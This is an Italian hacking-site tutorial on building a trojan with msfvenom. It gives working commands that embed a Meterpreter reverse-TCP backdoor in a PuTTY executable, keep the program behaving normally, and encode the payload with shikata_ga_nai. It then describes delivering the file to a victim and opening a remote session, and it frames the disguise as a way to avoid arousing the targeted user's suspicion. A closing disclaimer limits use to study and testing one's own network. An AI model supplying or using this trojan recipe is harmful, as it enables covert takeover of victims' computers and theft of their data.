HackerSecret.it - Il Sito Italiano Più Autorevole sul Mondo dell'Hacking, del Penetration Testing e della CyberSecurity

  • Home
  • Visita il Nostro Shop
  • Scarica l’App gratuita
VISITA IL NOSTRO SHOP ! CLICCA QUI !

Creare un trojan con MSFvenom – Backdoor in un file eseguibile

da Lo Staff di HackerSecret.it / domenica, 09 Giugno 2019 / Pubblicato il Hacking
Share
Tweet
Pin

Nel primo articolo della guida su Metasploit Framework, ho utilizzato il tool MSFvenom per creare una backdoor che venisse attivata in seguito all’esecuzione da parte della vittima del file .exe prodotto. Essendo in un ambiente di test, avevo la sicurezza che il file sarebbe stato lanciato, ma in uno scenario reale, indurre la vittima ad eseguire un file totalmente anonimo può essere un compito piuttosto arduo. Per questo motivo, in questo capitolo della guida nasconderò la backdoor all’interno di un programma noto, così da non destare sospetti nell’utente attaccato, aumentando le possibilità di portare a termine l’attacco.

Per prima cosa, scelgo il programma da utilizzare come trojan, effettuando il download di Putty. Putty è un software piuttosto diffuso che serve a stabilire connessioni SSH da Windows verso macchine remote. Il suo bacino di utenza, fa di esso un candidato ideale per l’attaccante che spera di controllare computer ricchi di informazioni, che si connettono con altri PC e server remoti.

Se ricordate, il comando utilizzato per la creazione del payload nel primo articolo della guida era il seguente

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=[ip_macchina_attaccante] LPORT=[porta_per_la_connessione] -f exe > [file].exe

Il comando che utilizzeremo per la creazione del trojan non differisce di molto dal precedente, dobbiamo solo specificare qualche parametro in più per assicurarci di utilizzare Putty come template, mantenere il comportamento del software sulla macchina della vittima e codificare il payload. Il comando modificato si presenta così

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -x putty.exe -k LHOST=[ip_macchina_attaccante] LPORT=[porta_per_la_connessione] -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o [file].exe

In pochi secondi, la schermata del terminale ci confermerà l’avvenuta creazione del payload.

Creazione trojan MSFvenom

Impostiamo il solito listener sulla macchina attaccante.

Passiamo sulla macchina target, preoccupandoci di consegnarle il file appena creato. Lanciamo il programma che, come possiamo vedere dall’immagine funziona perfettamente grazie allo switch k impostato durante la creazione del payload

Esecuzione trojan backdoor

Nel momento in cui la vittima esegue il file infetto, una sessione di Meterpreter si apre sul terminale della macchina attaccante.

Sessione Meterpreter avviata

Baty’s Base

Share
Tweet
Pin
Taggato in: Backdoor, Creare, eseguibile, file, MSFVenom, trojan

Clicca subito qui per visitare il nostro Shop!

Clicca subito qui per visitare il nostro Shop!

Altri 2300 utenti come te lo hanno già fatto quest'anno!

Dicono di Noi

Francesca M. – Sistemista

Share
Tweet
Pin
 
Samuel D. – Hacker Etico

Share
Tweet
Pin
 
Carola M. – Influencer

Share
Tweet
Pin
 
Renato P. – Investigatore Privato

Share
Tweet
Pin
 
Rosaria S. – Casalinga

Share
Tweet
Pin
 
Paolo V. – Consulente Informatico

Share
Tweet
Pin
 
Matteo C. – Imprenditore

Share
Tweet
Pin
 
Alice B. – Studentessa di Informatica

Share
Tweet
Pin
 
Goffredo B. – Analista IT

Share
Tweet
Pin
 
Roberto C. – Programmatore

Share
Tweet
Pin
 

SCARICATA 1316 VOLTE!

SCARICATA 1316 VOLTE!

Scarica subito Hacker Secret la nostra app Android gratuita.

Cerca nel Sito

Gli ultimi articoli

  • I più famosi hacker italiani

  • Cos’è l’informatica forense?

  • Come capire se ti spiano il cellulare?

  • Il concetto di sicurezza informatica

  • Metasploit tutorial in italiano

Tutte le tecniche, i prodotti e i servizi descritti o contenuti in questo sito si intendono per uso esclusivo di studio e di aggiornamento professionale e per testare la sicurezza della propria rete informatica in accordo alle vigenti normative sull'accesso a sistemi informativi e telematici (cfr. art. 615 ter c.p. e successive modifiche).

TORNA SU
Nuovo Ordine!